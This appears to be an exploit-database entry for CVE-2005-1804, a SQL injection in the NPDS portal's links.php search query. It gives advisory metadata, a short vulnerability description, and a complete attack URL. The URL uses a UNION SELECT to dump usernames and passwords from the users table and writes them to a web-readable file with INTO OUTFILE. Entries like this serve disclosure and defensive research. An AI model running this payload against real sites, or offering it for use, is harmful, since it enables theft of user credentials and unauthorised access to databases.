NPDS 4.8 < 5.0 - 'links.php?Query' SQL Injection

Author: NoSP
type: webapps
platform: php
port: 
date_added: 2005-05-28  
date_updated: 2016-10-27  
verified: 1  
codes: CVE-2005-1804;OSVDB-16926  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25749.txt  
source: https://www.securityfocus.com/bid/13803/info

NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks.

This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.

All versions of NPDS are considered vulnerable to this issue at the moment.

http://www.example.com/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/s
qlinjection.txt'/*